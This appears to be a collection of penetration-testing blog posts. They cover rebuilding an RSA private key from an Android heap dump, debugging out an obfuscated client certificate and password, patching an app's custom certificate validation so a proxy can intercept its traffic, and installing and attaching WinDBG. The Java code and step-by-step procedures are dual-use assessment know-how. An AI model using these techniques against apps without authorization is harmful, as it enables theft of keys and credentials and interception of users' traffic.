    2. Extract public key from the PEM file with OpenSSL


Let us now look at the involved details.

The third component from the first image above corresponds to an instance of RSAPrivateCrtKeySpec, which was the starting point to construct the key. Selecting the com.android.org.bouncycastle.jcajce.provider.asymmetric.rsa.BCRSAPrivateCrtKey entry in MAT’s Dominator Tree populated the Attributes tab with the information (type, instance name and object reference) pertaining to the several participating BigInteger instances that are required to build this RSAPrivateCrtKeySpec. The following are the participating BigInteger components that make up an RSAPrivateCrtKeySpec:

  1. modulus
  2. publicExponent
  3. privateExponent
  4. primeP
  5. primeQ
  6. primeExponentP
  7. primeExponentQ
  8. crtCoefficient


I used this information to segregate the BigInteger component values into different variables as their values were copied out to the file system (see figure below). For example, the crtCoefficient at @0x410b0080 in the Attributes tab (left) was mapped to an array of 32 integers (right). The modulus at @0x410afde0 was 64 ints long, which indicated that the key size was 2048 bits. Since MAT does not know how to export BigInteger objects, I used the actual int[] reference inside the corresponding BigInteger dropdown to copy out the binary content.

That is, I right clicked on the int[] dropdowns under each BigInteger while exporting their content. This process was repeated for all the BigInteger components, resulting in 8 local files named after the attribute names.

Here's the Attributes pane and corresponding BigInteger objects in the heap



and the corresponding int[] content dump.



The next step after extracting the BigInteger components was to check whether I could use them to reconstruct the RSAPrivateCrtKeySpec. So I decided to perform two basic tests before going forward.

  1. Read individual int values from the file where the int[] was dumped and match them against the values in MAT
  2. Check that all BigInteger components are positive numbers


I wrote some Java code to help me test all the binary dumps against these two conditions. The results indicated that the first condition was true for all BigInteger components, but the second condition was not met by 3 out of the 8 BigInteger components, which had negative values as shown below.
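The original test code isn't reproduced here; a minimal sketch of such a check (my reconstruction, using a hypothetical dump file named "modulus") might look like this:

import java.io.DataInputStream;
import java.io.EOFException;
import java.io.FileInputStream;
import java.math.BigInteger;
import java.util.ArrayList;

public class DumpSanityCheck {
    public static void main(String[] args) throws Exception {
        ArrayList<Integer> ints = new ArrayList<>();
        try (DataInputStream in = new DataInputStream(new FileInputStream("modulus"))) {
            while (true)
                ints.add(in.readInt());   // condition 1: compare these against the values shown in MAT
        } catch (EOFException endOfDump) {
            // all ints have been read
        }

        // Pack the ints back into big-endian bytes and build a BigInteger from them
        byte[] bytes = new byte[ints.size() * 4];
        for (int i = 0; i < ints.size(); i++) {
            int v = ints.get(i);
            bytes[i * 4]     = (byte) (v >>> 24);
            bytes[i * 4 + 1] = (byte) (v >>> 16);
            bytes[i * 4 + 2] = (byte) (v >>> 8);
            bytes[i * 4 + 3] = (byte) v;
        }
        BigInteger value = new BigInteger(bytes);
        System.out.println("first int = " + ints.get(0));
        System.out.println("positive? " + (value.signum() > 0)); // condition 2
    }
}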

Here are the matching integers from the binary dump checked against MAT (Condition 1):



Here are the negative values (Condition 2):

I searched around to identify the reason for the negative values, and the comments in the OpenJDK code indicated that negative values can be the result of incorrect ASN.1 encoding. So I included the corresponding code to calculate and return the 2's complement for negative BigInteger values before supplying the values to the RSAPrivateCrtKeySpec constructor.

The final Java code that reads the binary BigInteger (int[]) components from file system and creates RSAPrivateCrtKey in PKCS8 format is provided below.

import java.io.DataInputStream;
import java.io.EOFException;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.math.BigInteger;
import java.nio.ByteBuffer;
import java.nio.IntBuffer;
import java.security.KeyFactory;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.security.PrivateKey;
import java.security.Security;
import java.security.spec.InvalidKeySpecException;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.RSAPrivateCrtKeySpec;
import java.util.ArrayList;

import org.bouncycastle.jce.provider.BouncyCastleProvider;

public class GenerateKey {

    // Packs the int[] exported from MAT into a byte[] and returns a positive BigInteger
    public static BigInteger bitIntFromByteArray(int[] byteArrayParam) {
        byte[] localByteArray = new byte[byteArrayParam.length * 4];
        ByteBuffer byteBuffer = ByteBuffer.wrap(localByteArray);
        IntBuffer intBuffer = byteBuffer.asIntBuffer();
        intBuffer.put(byteArrayParam);

        BigInteger bigInteger = new BigInteger(localByteArray);
        // If the raw bytes produce a negative value, rebuild it as a positive BigInteger
        if (bigInteger.compareTo(BigInteger.ZERO) < 0)
            bigInteger = new BigInteger(1, bigInteger.toByteArray());
        return bigInteger;
    }

    // Reads a binary int[] dump (as exported from MAT) and converts it to a BigInteger
    public static BigInteger bigIntegerFromBinaryFile(String filename) throws IOException {
        ArrayList<Integer> intArrayList = new ArrayList<Integer>();
        DataInputStream inputStream = new DataInputStream(new FileInputStream(filename));
        try {
            while (true)
                intArrayList.add(inputStream.readInt());
        } catch (EOFException ex) {
            // end of file reached -- all ints have been read
        } finally {
            inputStream.close();
        }

        int[] intArray = new int[intArrayList.size()];
        for (int i = 0; i < intArrayList.size(); i++)
            intArray[i] = intArrayList.get(i);
        return bitIntFromByteArray(intArray);
    }

    public static void main(String[] args) throws KeyStoreException, NoSuchProviderException, NoSuchAlgorithmException, InvalidKeySpecException, FileNotFoundException, IOException, ClassNotFoundException {
        Security.addProvider(new BouncyCastleProvider());

        // Read each BigInteger component back from its binary dump
        BigInteger crtCoefficient = bigIntegerFromBinaryFile("h:\\key-coeffs\\crtCoefficient");
        BigInteger modulus = bigIntegerFromBinaryFile("h:\\key-coeffs\\modulus");
        BigInteger primeExponentP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentP");
        BigInteger primeExponentQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeExponentQ");
        BigInteger primeP = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeP");
        BigInteger primeQ = bigIntegerFromBinaryFile("h:\\key-coeffs\\primeQ");
        BigInteger privateExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\privateExponent");
        BigInteger publicExponent = bigIntegerFromBinaryFile("h:\\key-coeffs\\publicExponent");

        System.out.println("crtCoefficient\t" + crtCoefficient);
        System.out.println("modulus\t" + modulus);
        System.out.println("primeExponentP\t" + primeExponentP);
        System.out.println("primeExponentQ\t" + primeExponentQ);
        System.out.println("primeP\t" + primeP);
        System.out.println("primeQ\t" + primeQ);
        System.out.println("privateExponent\t" + privateExponent);
        System.out.println("publicExponent\t" + publicExponent);

        // Rebuild the private key from its CRT components and write it out in PKCS8 format
        RSAPrivateCrtKeySpec spec = new RSAPrivateCrtKeySpec(modulus, publicExponent, privateExponent, primeP, primeQ, primeExponentP, primeExponentQ, crtCoefficient);
        KeyFactory factory = KeyFactory.getInstance("RSA", "BC");
        PrivateKey privateKey = factory.generatePrivate(spec);
        System.out.println(privateKey);
        PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec(privateKey.getEncoded());
        FileOutputStream fos = new FileOutputStream("h:\\key-coeffs\\private-pkcs8.der");
        fos.write(pkcs8EncodedKeySpec.getEncoded());
        fos.close();
    }
}




Converting PKCS8 to PEM

The next step of the process was to convert the private key from PKCS8 format to a PEM file and then to generate the public key from the private key with the following OpenSSL commands:

openssl pkcs8 -inform DER -nocrypt -in private-pkcs8.der -out privatePem.pem

openssl rsa -in privatePem.pem -pubout



Here is OpenSSL converting the PKCS8:



Finally we have the outputted RSA private key:



And we can use OpenSSL to extract the public key from the privatePem.pem file:



Conclusion

Memory analysis is a powerful technique that can be used to identify and extract sensitive information from application runtime. The extracted information can then be used to possibly defeat client side security controls.


Debugging Out a Client Certificate from an Android process

By Gursev Singh Kalra.

On most of my mobile hacking projects I set up my web proxy to intercept the Android application’s traffic, test the proxy configuration, and traffic interception usually works like a charm. However, from time to time things aren't so straightforward. On a recent project, connections to the application’s server returned an HTTP 403 error code because SSL mutual authentication was enforced and I did not have the client certificate.

I was in a situation where no meaningful communication could be established with the remote server. The resource files obtained by decompiling the application did not contain the client certificate, and it was clear that it was stored somewhere in the obfuscated code.

I had already extracted an RSAPrivateCrtKey and two certificates from the application’s memory as discussed in my previous blog post. As it turned out, those were not sufficient and I still needed the client certificate and the corresponding password to be able to connect to the server and test the server side code. This blog post will detail how they were retrieved by debugging the application.

Identifying the Code Using the Client Certificate

The knowledge of how Java clients use SSL certificates to support client authentication proved critical during this assessment and helped me identify the function calls to look for during the debugging process. The typical steps followed to load a client certificate for a HttpsURLConnection are summarized below:

  1. Create instances of following classes:
    1. HttpsURLConnection - to communicate with the remote server
    2. KeyStore - to hold client certificate
    3. KeyManagerFactory - to hold KeyStore
    4. SSLContext - to hold the KeyManagers
  2. Create File instance for the client certificate and wrap it inside an InputStream
  3. Invoke KeyStore instance’s load method with InputStream from step 2 and certificate password as char[] so it contains the client certificate
  4. Feed the KeyManagerFactory instance with KeyStore from step 3 and certificate password by invoking its init method
  5. Obtain KeyManager[] array from the KeyManagerFactory created above
  6. Invoke the SSLContext instance’s init method and feed it the KeyManager[] from step 5
  7. Obtain a SSLSocketFactory from the created SSLContext and setup the HttpsURLConnection instance to use it for all SSL communication.
The following image depicts the steps discussed:



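To make those steps concrete, here is a minimal sketch of the pattern (my own illustration, not the target application's code, assuming a hypothetical PKCS#12 file named client-cert.pfx, password "changeit", and server URL):

import java.io.FileInputStream;
import java.net.URL;
import java.security.KeyStore;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.KeyManagerFactory;
import javax.net.ssl.SSLContext;

public class ClientCertExample {
    public static void main(String[] args) throws Exception {
        char[] password = "changeit".toCharArray();

        // Steps 2-3: load the client certificate into a KeyStore
        KeyStore keyStore = KeyStore.getInstance("PKCS12");
        try (FileInputStream in = new FileInputStream("client-cert.pfx")) {
            keyStore.load(in, password);
        }

        // Step 4: feed the KeyStore and password to a KeyManagerFactory
        KeyManagerFactory kmf = KeyManagerFactory.getInstance(KeyManagerFactory.getDefaultAlgorithm());
        kmf.init(keyStore, password);

        // Steps 5-6: initialize an SSLContext with the KeyManager[] array
        SSLContext sslContext = SSLContext.getInstance("TLS");
        sslContext.init(kmf.getKeyManagers(), null, null);

        // Step 7: use the resulting SSLSocketFactory for the HTTPS connection
        HttpsURLConnection conn = (HttpsURLConnection) new URL("https://example.com/").openConnection();
        conn.setSSLSocketFactory(sslContext.getSocketFactory());
        System.out.println("HTTP " + conn.getResponseCode());
    }
}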
Instantiating a KeyStore and loading an InputStream for a client certificate are central to SSL client authentication support. So I searched the decompiled code for KeyStore class usage, corresponding instance variables and identified classes and methods that were potentially configuring the client side SSL certificate for HttpsURLConnection.

Identifying the Debug Points

I continued to eliminate KeyStore usages till I identified the class and method I was interested in. The identified class and method did not refer to any resource files to get the client certificate and its password, but relied on a couple of function calls to get the byte[] representation of the client certificate and the String representation of the password before feeding them to the load method of the KeyStore instance. Following the code paths led me to the two magic strings that I was looking for. They appeared to be Base64 encoded values of the client certificate and the corresponding password.

Base64 decoding them returned gibberish which could not be put to any practical use as there was more to the encoded values than plain Base64 encoding. Further analysis revealed that they were subjected to standard crypto algorithms, and those algorithms were fed their Initialization Vectors and Encryption Keys from other Java classes. Additionally, the application also used some custom data manipulation tricks to further obfuscate them.

With limited time at hand I decided to briefly shelve the code analysis and move to application debugging to inspect the exact code points of interest for data extraction. To help with the debugging process, I noted down the class name, method name, and instance variable of interest where the potential client certificate and password were fed to the KeyStore instance.

Setting up the Application for Debugging

Reviewing AndroidManifest.xml of the decompiled application indicated that the application was not compiled with the debug flag and hence could not be debugged on a device. So I added the debug flag, recompiled it, signed the application and then installed it on the device. The following steps summarize the process of creating debuggable versions of existing Android applications if you plan to debug the application on an actual device.

  1. Decompile the application with apktool
  2. Add the android:debuggable="true" attribute to the application element in the AndroidManifest.xml
  3. Recompile the application with apktool
  4. Sign the application with SignApk
  5. Install the application
The image below shows the debuggable attribute added to the AndroidManifest.xml file of the target application.



If you are using an emulator, you can extract the application from the device, install it on the emulator and attach a debugger without decompiling or adding the debuggable attribute to the AndroidManifest.xml file.

Let us now look at some of the important pieces of the debugging setup that was used.

Java Debug Wire Protocol

The Java Debug Wire Protocol (JDWP) is a protocol used for communication between a JDWP compliant debugger and the Java Virtual Machine. The Dalvik Virtual Machine that is responsible for running applications on Android devices supports JDWP as its debugging protocol. Each application that runs on a Dalvik VM exposes a unique port to which JDWP compliant debuggers can attach and debug the application.

Once the application was installed on the device in debug mode, the next step was to attach a JDWP compliant debugger, such as jdb, and get going.

jdb - The Java Debugger

jdb is a JDWP compatible command-line debugger that ships with Java JDK and I use jdb for its command line goodness. The typical process of attaching jdb to an Android application is summarized below:

  1. Launch the application that you want to debug
  2. Obtain its process ID
  3. Use adb to port forward JDWP connection to the application JDWP port
  4. Attach jdb to the application
  5. Set breakpoints and debug the application
The following resources can get you started on jdb debugging with Android.

Debugging for the Client Certificate

At this point, I knew the exact locations where breakpoints were needed to obtain the client certificate and corresponding password. I set up the breakpoints in the functions that invoked the load method of a KeyStore instance to store the client certificate. I then launched the application and browsed to the functionalities that would invoke the code paths leading to the breakpoints.

After hitting the breakpoint, I executed jdb's dump command to query the instance variable and invoked its different methods to retrieve the important information. The instance variable of interest was of class g. The Java class under analysis retrieved the client certificate and its password with the following calls before feeding them to the load method:

  1. It called a method b() on its instance variable “g” to obtain the certificate password and converted it to char[]
  2. It called a method a() on its instance variable “g” to obtain byte[] representation of client certificate and wrapped it in a ByteArrayInputStream
The following screenshot shows the rundown leading up to the client certificate and the password.



After obtaining the byte[] dump of the client certificate, I created the pfx file with the following Java code and then imported it into my browser store and also into the web proxy.

import java.io.FileOutputStream;
import java.io.IOException;

public class PfxCreatorFromByteArray {
    public static void main(String... args) throws IOException {
        // Contains the byte[] for the client certificate (truncated here)
        byte[] pfx = {48, -126, };
        FileOutputStream fos = new FileOutputStream("client-cert.pfx");
        fos.write(pfx);
        fos.close();
    }
}




The following image shows successful client certificate import.



The imported client certificate then allowed me to successfully engage and assess the server portion of the application. In addition to the client certificate, combining the static and dynamic analysis techniques also allowed me to retrieve other sensitive information like Initialization Vectors, Encryption Keys etc… from the application.

Patching an Android Application to Bypass Custom Certificate Validation

By Gursev Kalra.

One of the important tasks while performing mobile application security assessments is to be able to intercept the traffic (Man in The Middle, MiTM) between the mobile application and the server with a web proxy like Fiddler, Burp etc… This allows the penetration tester to observe application behavior, modify the traffic and overcome the input restrictions enforced by the application’s user interface to perform a holistic penetration test.

Mobile applications exchanging sensitive data typically use the HTTPS protocol for data exchange as it allows them to perform server authentication to ensure a secure communication channel. The client authenticates the server by verifying the server’s certificate against its trusted root certificate authority (CA) store and also checks the certificate’s common name against the domain name of the server presenting the certificate. To proxy (MiTM) the HTTPS traffic of a mobile application, the web proxy’s certificate is imported into the trusted root CA store; otherwise the application may not function due to certificate errors.

For most mobile application assessments you can just set up a web proxy to intercept the mobile application’s SSL traffic by importing its certificate into the device’s trusted root CA store. To ensure that the imported CA certificate works fine, it's common to use the Android browser to visit a couple of SSL based websites; the browser should accept the MiTM’ed traffic without complaint. Typically, native Android applications also use the common trusted root CA store to validate server certificates, so no extra work is required to intercept their traffic. However, for some applications that could differ - let's take a look at how to handle those apps.

Analyzing the Unsuccessful MiTM

When you launch the application under test and attempt to pass its traffic through the web proxy, the application will likely display an error screen indicating that it could not connect to the remote server because there is no internet connection, or that it could not establish a connection for unknown reasons. If you're confident in your setup, the next step is to analyze the system logs and SSL cipher suite support.

logcat

logcat is Android’s logging mechanism that is used to view application debug messages and logs. First run "adb logcat" to check if the application under test creates any stack trace indicating the cause of the error (in my case there was none). The application may also leave debug logs indicating that the developers did a good job with the error handling, or write debug messages that could potentially expose the application's internal workings to prying eyes.

Common SSL Cipher suites

When a web proxy acts as a MiTM between the client and the server, it establishes two SSL communication channels. One channel is with the client to receive requests and return responses; the second channel is used to forward application requests to the server and receive server responses. To establish these channels, the web proxy has to agree on common SSL cipher suites with both the client and the server, and these cipher suites may not be the same, as shown in the image below.



You may see SSL proxying errors occur in one or both of the following scenarios which lead to failures while establishing a communication channel.

  1. Android application and the web proxy do not share any common SSL cipher suite.
  2. The web proxy and the server do not share any common SSL cipher suite.
In both scenarios, the communication channel cannot be established and the application does not work. To analyze the above mentioned scenarios, fire up Wireshark to analyze the SSL handshake between the application and the web proxy. If you don't see any issues in Wireshark between the application and the proxy, issue an HTTPS request to the server from within the web proxy to see if you have any issues there. If not, then you know the web proxy is capable of performing MiTM for the test application and there is something else going on under the hood.

Custom Certificate Validation

At this point you should start to look into the possibility of the application performing custom certificate validation to prevent a MiTM from monitoring/modifying its traffic flow. HTTPS clients can perform custom certificate validation by implementing the X509TrustManager interface and then using it for their HTTPS connections. The process of creating HTTPS connections with custom certificate validation is summarized below (a code sketch follows the list):

  1. Implement methods of the X509TrustManager interface as required. The server certificate validation code will live inside the checkServerTrusted method. This method will throw an exception if the certificate validation fails or will return void otherwise.
  2. Obtain a SSLContext instance.
  3. Create an instance of the X509TrustManager implementation and use it to initialize SSLContext.
  4. Obtain SSLSocketFactory from the SSLContext instance.
  5. Provide the SSLSocketFactory instance to setSSLSocketFactory method of the HttpsURLConnection.
  6. The HttpsURLConnection instance will then communicate with the server and invoke the checkServerTrusted method to perform custom server certificate validation.
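Here is a minimal sketch of that pattern (my own illustration, not the target application's code; the validation logic that would live inside checkServerTrusted is only hinted at, and the URL is a placeholder):

import java.net.URL;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class CustomTrustExample {
    static class PinningTrustManager implements X509TrustManager {
        public void checkClientTrusted(X509Certificate[] chain, String authType) {
            // not used by client side code
        }
        public void checkServerTrusted(X509Certificate[] chain, String authType)
                throws CertificateException {
            // custom server certificate validation lives here; throw CertificateException on failure.
            // An empty body (returning void) is effectively what the patch described later achieves.
        }
        public X509Certificate[] getAcceptedIssuers() {
            return new X509Certificate[0];
        }
    }

    public static void main(String[] args) throws Exception {
        // Steps 2-4: initialize an SSLContext with the custom TrustManager
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, new TrustManager[] { new PinningTrustManager() }, null);

        // Steps 5-6: hand the SSLSocketFactory to the HttpsURLConnection
        HttpsURLConnection conn =
                (HttpsURLConnection) new URL("https://example.com/").openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        System.out.println("HTTP " + conn.getResponseCode());
    }
}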
So, if you can decompile the code and search through it, you'll likely find the X509TrustManager implementation in one of the core security classes of the application. The next step is to patch the code preventing the MiTM and deploy it for testing. The image below shows two methods implemented for X509TrustManager from an example application.



Modifying checkServerTrusted Implementation

The example image above shows the implementation of two X509TrustManager methods, checkServerTrusted and checkClientTrusted. At this point it is important to point out that in the example above, both methods behave in a similar way, except that the former is used by client side code and the latter is used by server side code. If the certificate validation fails, the methods will throw an exception; otherwise they return void.

The checkClientTrusted implementation above allows server side code to validate a client certificate. Since this functionality is not required inside the mobile application, this method can be empty and return void for the test application, which is equivalent to successful validation. However, checkServerTrusted contains a significant chunk of code performing the custom certificate validation, which needs to be bypassed.

To bypass the certificate validation code inside the checkServerTrusted method for this example, I replaced its Dalvik code with the code from the checkClientTrusted method so that it simply returns void, effectively bypassing the custom certificate check as shown in the image below.



Recompiling and Deploying the Modified Application

Once you have all the checkServerTrusted invocations set up to succeed, recompile the application with apktool, sign it with SignApk and deploy it on the device. If you did it all right, the web proxy MiTM will work like a charm and you will be able to view, modify and fuzz application traffic.

Getting Started with WinDBG - Part 1

By Brad Antoniewicz.

WinDBG is an awesome debugger. It may not have a pretty interface or a black background by default, but it is still one of the most powerful and stable Windows debuggers out there. In this article I'll introduce you to the basics of WinDBG to get you up and running.

In this blog post we'll cover installing and attaching to a process, then in the next blog post we'll go over breakpoints, stepping, and inspecting memory.

Installation

Microsoft has changed things slightly in WinDBG's installation from Windows 7 to Windows 8. In this section we'll walk through the install on both.

Windows 8

For Windows 8, Microsoft includes WinDBG in the Windows Driver Kit (WDK). You can install Visual Studio and the WDK or just install the standalone "Debugging Tools for Windows 8.1" package that includes WinDBG.

This is basically a thin installer that needs to download WinDBG after you walk through a few screens. The install will ask you if you'd like to install locally or download the development kit for another computer. The latter is the equivalent of an offline installer, which is my preference so that you can install on other systems easily in the future.



From there just Next your way to the features page and deselect everything but "Debugging Tools for Windows" and click "Download".



Once the installer completes you can navigate to your download directory, which is c:\Users\Username\Downloads\Windows Kits\8.1\StandaloneSDK by default, and then click Next through that install. Then you're all ready to go!

Windows 7 and Below

For Windows 7 and below, Microsoft offers WinDBG as part of the "Debugging Tools for Windows" package that is included within the Windows SDK and .Net Framework. This requires you to download the online/offline installer, then specifically choose the "Debugging Tools for Windows" install option.

My preference is to check the "Debugging Tools" option under "Redistributable Packages" and create a standalone installer, which makes future debugging efforts a heck of a lot easier. That's what I'll do here.



Once the installation completes, you should have the redistributables for various platforms (x86/x64) in the c:\Program Files\Microsoft SDKs\Windows\v7.1\Redist\Debugging Tools for Windows\ directory.



From there the installation is pretty simple, just copy the appropriate redistributable to the system you're debugging and then click through the installation.

Interface

When you run WinDBG for the first time, you'll realize that it's intimidatingly simple. Most of WinDBG's interface is experienced while you're actually debugging a process, so you're not going to do too much with WinDBG until you attach it to a process. Rather than having a section dedicated to the interface (too late!) we'll point out the important parts in the upcoming sections.

The most basic thing about the interface you should know is the Command window. It's the default window opened once you're attached to a process. The Command window is mostly an output-only window, with a small input field at the bottom into which you'll enter commands to control WinDBG.



Symbols

WinDBG doesn't really need much configuration, most things work right out of the box. The one important thing to do is set up Symbols. Symbols are basically special files that are generated with the program binary at compile time and provide debugging information such as function and variable names. This can really help demystify a lot of the functionality of an application when debugging or disassembling. Many Microsoft components are compiled with Symbols, which are distributed via the Microsoft Symbol Server. For non-Microsoft binaries, you're usually out of luck - sometimes you'll find them lying around somewhere, but mostly companies keep that stuff protected.

To configure WinDBG to use the Microsoft Symbol server go to File:Symbol File Path and set the path appropriately to the one below. The syntax is a little weird, asterisks are the delimiter, so in the value below, we'll download symbols to the C:\Symbols directory.

SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols




WinDBG will automatically load Symbols for binaries that it has them for when needed. To add a folder containing symbols, you can just append it to the path:

SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols;c:\SomeOtherSymbolFolder


Adding Symbols during Debugging

If you do run into a situation where you have Symbols and would like to import them while debugging, you can do so via the .sympath command within the command window (this requires you to be attached to a process). For instance, to append c:\SomeOtherSymbolFolder you can:

0:025> .sympath+ c:\SomeOtherSymbolFolder
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols;c:\SomeOtherSymbolFolder
Expanded Symbol search path is: srv*c:\symbols*http://msdl.microsoft.com/download/symbols;c:\someothersymbolfolder


It's always good to reload the symbols after you make changes to the path:

0:025> .reload
Reloading current modules
................................................................
...............................................


Checking Symbols

To view which modules have symbols loaded, you can use the x*! command. However, WinDBG doesn't load Symbols until it needs them, so x*! will show that most of the module symbols are deferred. We can force WinDBG to load symbols with the ld * command (which may take a little time; you can stop it by going to Debug:Break):



Now we can view the symbols for each of the modules:



Debugging a Local Process

You have a couple options when debugging a local process. You can start the process then attach to it, or have WinDBG launch the process for you. I'm not really sure of all the advantages/disadvantages of each - I know that when you launch a program with WinDBG, it enables some special debugging options (e.g. debug heap) that the program may not like, and it will crash. That being said, there are also programs that will crash when you attach the debugger, so ymmv. Some applications (malware in particular) will look for the presence of the debugger at launch and may not later on, which would be a reason why you'd attach. And sometimes you're debugging a service that is controlled by Windows which sets up a variety of things during its launch, so to simplify things, you'd attach rather than launch via the debugger. Some people say there is a significant performance impact when launching a process via the debugger. Test it out yourself, and see what works best for you. If you have any particular reasons why you'd do one over the other, please let me know in the comments!

Starting a Process

If you're debugging a self contained application that just runs locally and doesn't communicate via the network, you may want to have WinDBG start the application. However, that's not to say you can't attach to these programs after they've been launched.

Starting a process is pretty straightforward: go to "File:Open Executable". From there, select the executable you'd like to debug. You can also provide command line arguments and define the start directory:



Attaching to a Process

Attaching to an already running process is just as simple. Note that in some cases, you'll need to spend a little time identifying the true process you're looking to target. For instance, some web browsers will create one parent process, then an additional process for each tab. So depending on the crash you're debugging, you might want to attach to the tab process rather than the parent.

To attach to an already existing process, go to "File:Attach to a Process" then select the PID or process name to attach to. Keep in mind you'll also need the appropriate rights to attach to your target process.



If the program has stopped responding, you can attach noninvasively by using the "Noninvasive" checkbox.

Debugging a Remote Process

Now there may be times where you have to debug a process on a remote system. For instance, it may just be more convenient to use a local debugger rather than one within a VM or via RDP. Or perhaps you are debugging LoginUI.exe - which is only available while the system is locked. In these situations you can have a WinDBG instance running on the target system and then remotely connect to it. There are a couple ways to do this as well - we'll cover two of the most common ways.

Existing Debugging Sessions

If you've already started to debug the program locally (via attaching or launching mentioned above) you can use the command input field to have WinDBG launch a listener that a remote debugger can connect to. This is done with the .server command:

.server tcp:port=5005


You'll likely get a security alert that you should allow:



Then a positive message within WinDBG telling you the server has started:

0:005> .server tcp:port=5005
Server started. Client can connect with any of these command lines
0: <debugger> -remote tcp:Port=5005,Server=USER-PC


Then from the remote host, you can connect to the existing debugging session via "File:Connect to a Remote Session":



tcp:Port=5005,Server=192.168.127.138


Once connected you'll get a confirmation on the remote client:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Server started. Client can connect with any of these command lines
0: <debugger> -remote tcp:Port=5005,Server=USER-PC
MACHINENAME\User (tcp 192.168.127.138:13334) connected at Mon Dec 16 09:03:03 2013



and on the local debugging instance:

MACHINENAME\User (tcp 192.168.127.138:13334) connected at Mon Dec 16 09:03:03 2013



Remote Server

You can also have a standalone WinDBG server running on a system, remotely connect to it, and then have the ability to select which process to attach to. This can be done using the dbgsrv.exe executable on the system where the process is (or will be) running:

 dbgsrv.exe -t tcp:port=5005





And you'll likely get a Windows Firewall notice, which you should allow:



From the remote system, you can connect by going to "File: Connect to Remote Stub" and defining the server:

tcp:Port=5005,Server=192.168.127.138


You won't get any obvious indicator that you're connected, but when you go to "File:Attach to a Process", you'll see the process list of the system you're running dbgsrv.exe on. Now you can attach to a process as you normally would as if the process was local.

Help

WinDBG's help system is awesome. As with all new things, you should become familiar with how to get help on a specific command or concept. From the command input you can use the .hh command to access WinDBG's help:

windbg> .hh 


You can also use .hh on a specific command. For instance, to get more information on the .reload command, you can use:

windbg> .hh .reload


Or just go to "Help:Contents".

Modules

As a program runs it pulls in a number of modules that provide functionality - thus if you're able to gain insight into what modules are imported by the application, it can help identify what the application does and how it may work. In many scenarios, you'll be debugging a particular module loaded by a program, rather than the program executable itself.

When you attach to a process, WinDBG will automatically list the loaded modules. For instance, here's WinDBG's output when I attached to calc.exe:

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00a70000 00b30000 C:\Windows\system32\calc.exe
ModLoad: 77630000 7776c000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77550000 77624000 C:\Windows\system32\kernel32.dll
ModLoad: 75920000 7596a000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 76410000 77059000 C:\Windows\system32\SHELL32.dll
ModLoad: 77240000 772ec000 C:\Windows\system32\msvcrt.dll
ModLoad: 76300000 76357000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cd0000 75d1e000 C:\Windows\system32\GDI32.dll
ModLoad: 75fa0000 76069000 C:\Windows\system32\USER32.dll
ModLoad: 777b0000 777ba000 C:\Windows\system32\LPK.dll
ModLoad: 774b0000 7754d000 C:\Windows\system32\USP10.dll
ModLoad: 73110000 732a0000 C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 75a80000 75bdc000 C:\Windows\system32\ole32.dll
ModLoad: 76360000 76401000 C:\Windows\system32\RPCRT4.dll
ModLoad: 777c0000 77860000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 75be0000 75bf9000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76270000 762ff000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 74590000 745d0000 C:\Windows\system32\UxTheme.dll
ModLoad: 74710000 748ae000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\COMCTL32.dll
ModLoad: 703d0000 70402000 C:\Windows\system32\WINMM.dll
ModLoad: 74c80000 74c89000 C:\Windows\system32\VERSION.dll
ModLoad: 77770000 7778f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75c00000 75ccc000 C:\Windows\system32\MSCTF.dll
ModLoad: 74130000 7422b000 C:\Windows\system32\WindowsCodecs.dll
ModLoad: 74260000 74273000 C:\Windows\system32\dwmapi.dll
ModLoad: 756d0000 756dc000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 75e60000 75ee3000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 6ef10000 6ef4c000 C:\Windows\system32\oleacc.dll



Later on in a debugging session you can reproduce these results with the lmf command:

0:005> lmf
start end module name
00a70000 00b30000 calc C:\Windows\system32\calc.exe
6ef10000 6ef4c000 oleacc C:\Windows\system32\oleacc.dll
703d0000 70402000 WINMM C:\Windows\system32\WINMM.dll
73110000 732a0000 gdiplus C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
74130000 7422b000 WindowsCodecs C:\Windows\system32\WindowsCodecs.dll
74260000 74273000 dwmapi C:\Windows\system32\dwmapi.dll
74590000 745d0000 UxTheme C:\Windows\system32\UxTheme.dll
